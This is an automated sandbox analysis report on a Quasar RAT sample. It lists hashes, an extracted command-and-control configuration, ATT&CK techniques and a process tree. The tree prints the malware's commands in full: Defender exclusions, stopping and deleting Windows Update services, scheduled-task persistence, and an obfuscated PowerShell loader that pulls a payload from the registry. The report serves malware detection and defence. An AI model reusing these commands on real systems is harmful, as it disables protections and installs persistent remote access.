quasar | 210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba

Analysis

max time kernel
17s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02/01/2025, 08:57

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

5fr5gthkjdg71.exe
Size

6.0MB
MD5

13b0dec8a2c9291ec13ca9d0f1a98b33
SHA1

762c7072179bce1822999dc30c6252262caf6c00
SHA256

210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
SHA512

b8b97a630c6f4eca602c756a5a1c29e1cc3354db29176a5b34cb92fd10b14665bde82d01f97c65fbdec3db343e20f6ec67a9e1d3db9c16c280f2e8962d144346
SSDEEP

98304:j3GflC+i0bBHXGgjaQx+OhfzTxzdloaDU5BKtxo5fQIwuhkNUwZ:j3GtCj0bR2Ej1hbTxkfzKYAEkXZ

Score

10^/10

quasar 4drun evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023c88-28.dat	family_quasar
behavioral2/memory/4920-31-0x00000000001D0000-0x0000000000254000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2304	powershell.exe
2540	powershell.exe
1720	powershell.exe
1784	powershell.exe
3548	powershell.exe
2960	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	5fr5gthkjdg71.exe

Executes dropped EXE 5 IoCs

pid	Process
3040	gfiKDLgr58thy4d.exe
2420	GR55Qg1hth.exe
4920	F4R5fd8grr.exe
4744	Client.exe
4556	kaptsegthwf.exe

Power Settings 1 TTPs 17 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3920	cmd.exe
2336	powercfg.exe
1456	powercfg.exe
4368	cmd.exe
4808	powercfg.exe
3992	powercfg.exe
4908	powercfg.exe
428	powercfg.exe
3324	powercfg.exe
4240	powercfg.exe
1536	powercfg.exe
764	powercfg.exe
380	powercfg.exe
1624	powercfg.exe
1336	powercfg.exe
4512	powercfg.exe
2016	powercfg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	gfiKDLgr58thy4d.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3040 set thread context of 2816	3040	gfiKDLgr58thy4d.exe	130

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1556	sc.exe
3504	sc.exe
3248	sc.exe
4660	sc.exe
3448	sc.exe
2908	sc.exe
1052	sc.exe
3808	sc.exe
2008	sc.exe
4752	sc.exe
3352	sc.exe
264	sc.exe
5100	sc.exe
3956	sc.exe
4352	sc.exe
4112	sc.exe
3720	sc.exe
2680	sc.exe
3944	sc.exe
3496	sc.exe
2160	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2948	schtasks.exe
5052	schtasks.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
3040	gfiKDLgr58thy4d.exe
1720	powershell.exe
1720	powershell.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
1784	powershell.exe
1784	powershell.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
2816	dialer.exe
2816	dialer.exe
3548	powershell.exe
3548	powershell.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3040	gfiKDLgr58thy4d.exe
3548	powershell.exe
4556	kaptsegthwf.exe
2816	dialer.exe
2816	dialer.exe
2304	powershell.exe
2304	powershell.exe
2304	powershell.exe
2816	dialer.exe
2816	dialer.exe
2816	dialer.exe
2816	dialer.exe
2304	powershell.exe
3548	powershell.exe
2816	dialer.exe
2816	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4920	F4R5fd8grr.exe
Token: SeDebugPrivilege	4744	Client.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	3040	gfiKDLgr58thy4d.exe
Token: SeDebugPrivilege	2816	dialer.exe
Token: SeShutdownPrivilege	1336	powercfg.exe
Token: SeCreatePagefilePrivilege	1336	powercfg.exe
Token: SeShutdownPrivilege	1536	powercfg.exe
Token: SeCreatePagefilePrivilege	1536	powercfg.exe
Token: SeShutdownPrivilege	4512	powercfg.exe
Token: SeCreatePagefilePrivilege	4512	powercfg.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeShutdownPrivilege	3992	powercfg.exe
Token: SeCreatePagefilePrivilege	3992	powercfg.exe
Token: SeShutdownPrivilege	4240	powercfg.exe
Token: SeCreatePagefilePrivilege	4240	powercfg.exe
Token: SeShutdownPrivilege	2336	powercfg.exe
Token: SeCreatePagefilePrivilege	2336	powercfg.exe
Token: SeShutdownPrivilege	4908	powercfg.exe
Token: SeCreatePagefilePrivilege	4908	powercfg.exe
Token: SeShutdownPrivilege	428	powercfg.exe
Token: SeCreatePagefilePrivilege	428	powercfg.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeIncreaseQuotaPrivilege	3548	powershell.exe
Token: SeSecurityPrivilege	3548	powershell.exe
Token: SeTakeOwnershipPrivilege	3548	powershell.exe
Token: SeLoadDriverPrivilege	3548	powershell.exe
Token: SeSystemProfilePrivilege	3548	powershell.exe
Token: SeSystemtimePrivilege	3548	powershell.exe
Token: SeProfSingleProcessPrivilege	3548	powershell.exe
Token: SeIncBasePriorityPrivilege	3548	powershell.exe
Token: SeCreatePagefilePrivilege	3548	powershell.exe
Token: SeBackupPrivilege	3548	powershell.exe
Token: SeRestorePrivilege	3548	powershell.exe
Token: SeShutdownPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeSystemEnvironmentPrivilege	3548	powershell.exe
Token: SeRemoteShutdownPrivilege	3548	powershell.exe
Token: SeUndockPrivilege	3548	powershell.exe
Token: SeManageVolumePrivilege	3548	powershell.exe
Token: 33	3548	powershell.exe
Token: 34	3548	powershell.exe
Token: 35	3548	powershell.exe
Token: 36	3548	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1524	svchost.exe
Token: SeIncreaseQuotaPrivilege	1524	svchost.exe
Token: SeSecurityPrivilege	1524	svchost.exe
Token: SeTakeOwnershipPrivilege	1524	svchost.exe
Token: SeLoadDriverPrivilege	1524	svchost.exe
Token: SeSystemtimePrivilege	1524	svchost.exe
Token: SeBackupPrivilege	1524	svchost.exe
Token: SeRestorePrivilege	1524	svchost.exe
Token: SeShutdownPrivilege	1524	svchost.exe
Token: SeSystemEnvironmentPrivilege	1524	svchost.exe
Token: SeUndockPrivilege	1524	svchost.exe
Token: SeManageVolumePrivilege	1524	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1524	svchost.exe
Token: SeIncreaseQuotaPrivilege	1524	svchost.exe
Token: SeSecurityPrivilege	1524	svchost.exe
Token: SeTakeOwnershipPrivilege	1524	svchost.exe
Token: SeLoadDriverPrivilege	1524	svchost.exe
Token: SeSystemtimePrivilege	1524	svchost.exe
Token: SeBackupPrivilege	1524	svchost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2420	GR55Qg1hth.exe
4744	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4188 wrote to memory of 3040	4188	5fr5gthkjdg71.exe	85
PID 4188 wrote to memory of 3040	4188	5fr5gthkjdg71.exe	85
PID 4188 wrote to memory of 2420	4188	5fr5gthkjdg71.exe	87
PID 4188 wrote to memory of 2420	4188	5fr5gthkjdg71.exe	87
PID 4188 wrote to memory of 4920	4188	5fr5gthkjdg71.exe	88
PID 4188 wrote to memory of 4920	4188	5fr5gthkjdg71.exe	88
PID 4920 wrote to memory of 5052	4920	F4R5fd8grr.exe	89
PID 4920 wrote to memory of 5052	4920	F4R5fd8grr.exe	89
PID 4920 wrote to memory of 4744	4920	F4R5fd8grr.exe	91
PID 4920 wrote to memory of 4744	4920	F4R5fd8grr.exe	91
PID 4744 wrote to memory of 2948	4744	Client.exe	92
PID 4744 wrote to memory of 2948	4744	Client.exe	92
PID 2420 wrote to memory of 1784	2420	GR55Qg1hth.exe	105
PID 2420 wrote to memory of 1784	2420	GR55Qg1hth.exe	105
PID 3288 wrote to memory of 2812	3288	cmd.exe	111
PID 3288 wrote to memory of 2812	3288	cmd.exe	111
PID 2420 wrote to memory of 2180	2420	GR55Qg1hth.exe	120
PID 2420 wrote to memory of 2180	2420	GR55Qg1hth.exe	120
PID 2420 wrote to memory of 3920	2420	GR55Qg1hth.exe	121
PID 2420 wrote to memory of 3920	2420	GR55Qg1hth.exe	121
PID 2420 wrote to memory of 3548	2420	GR55Qg1hth.exe	122
PID 2420 wrote to memory of 3548	2420	GR55Qg1hth.exe	122
PID 3040 wrote to memory of 2816	3040	gfiKDLgr58thy4d.exe	130
PID 3040 wrote to memory of 2816	3040	gfiKDLgr58thy4d.exe	130
PID 3040 wrote to memory of 2816	3040	gfiKDLgr58thy4d.exe	130
PID 3040 wrote to memory of 2816	3040	gfiKDLgr58thy4d.exe	130
PID 3040 wrote to memory of 2816	3040	gfiKDLgr58thy4d.exe	130
PID 3040 wrote to memory of 2816	3040	gfiKDLgr58thy4d.exe	130
PID 3040 wrote to memory of 2816	3040	gfiKDLgr58thy4d.exe	130
PID 3920 wrote to memory of 4240	3920	cmd.exe	137
PID 3920 wrote to memory of 4240	3920	cmd.exe	137
PID 2180 wrote to memory of 4112	2180	cmd.exe	138
PID 2180 wrote to memory of 4112	2180	cmd.exe	138
PID 3920 wrote to memory of 2336	3920	cmd.exe	141
PID 3920 wrote to memory of 2336	3920	cmd.exe	141
PID 2180 wrote to memory of 2680	2180	cmd.exe	142
PID 2180 wrote to memory of 2680	2180	cmd.exe	142
PID 2180 wrote to memory of 2908	2180	cmd.exe	165
PID 2180 wrote to memory of 2908	2180	cmd.exe	165
PID 3920 wrote to memory of 4908	3920	cmd.exe	147
PID 3920 wrote to memory of 4908	3920	cmd.exe	147
PID 3920 wrote to memory of 428	3920	cmd.exe	149
PID 3920 wrote to memory of 428	3920	cmd.exe	149
PID 2180 wrote to memory of 1052	2180	cmd.exe	153
PID 2180 wrote to memory of 1052	2180	cmd.exe	153
PID 2816 wrote to memory of 624	2816	dialer.exe	5
PID 2816 wrote to memory of 676	2816	dialer.exe	7
PID 2816 wrote to memory of 968	2816	dialer.exe	12
PID 2816 wrote to memory of 376	2816	dialer.exe	13
PID 2816 wrote to memory of 512	2816	dialer.exe	14
PID 2816 wrote to memory of 1028	2816	dialer.exe	15
PID 2180 wrote to memory of 3496	2180	cmd.exe	154
PID 2180 wrote to memory of 3496	2180	cmd.exe	154
PID 676 wrote to memory of 2788	676	lsass.exe	48
PID 2816 wrote to memory of 1072	2816	dialer.exe	16
PID 2816 wrote to memory of 1124	2816	dialer.exe	18
PID 2816 wrote to memory of 1140	2816	dialer.exe	19
PID 2816 wrote to memory of 1160	2816	dialer.exe	20
PID 2816 wrote to memory of 1172	2816	dialer.exe	21
PID 2816 wrote to memory of 1296	2816	dialer.exe	22
PID 2816 wrote to memory of 1368	2816	dialer.exe	23
PID 2816 wrote to memory of 1384	2816	dialer.exe	24
PID 2816 wrote to memory of 1408	2816	dialer.exe	25
PID 2180 wrote to memory of 2656	2180	cmd.exe	155

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:376
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8a8de6ae-25fc-447d-966c-77eaa3720c94}
  2⤵
  PID:4716
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{7970b1de-adca-4c03-a88a-76113805b8cb}
  2⤵
  PID:4812

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1072
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3044
- C:\Program Files\Cuis\bon\Bara.exe
  "C:\Program Files\Cuis\bon\Bara.exe"
  2⤵
  PID:2908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2540
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4328
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3248
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:3808
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:4368
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:1624
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:3324
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:4808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2960
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe ujznpffbjbh
    3⤵
    PID:2696
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      PID:1376
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    PID:2372
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  PID:4676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1368
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2736

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2848

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3308

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3404
- C:\Users\Admin\AppData\Local\Temp\5fr5gthkjdg71.exe
  "C:\Users\Admin\AppData\Local\Temp\5fr5gthkjdg71.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe
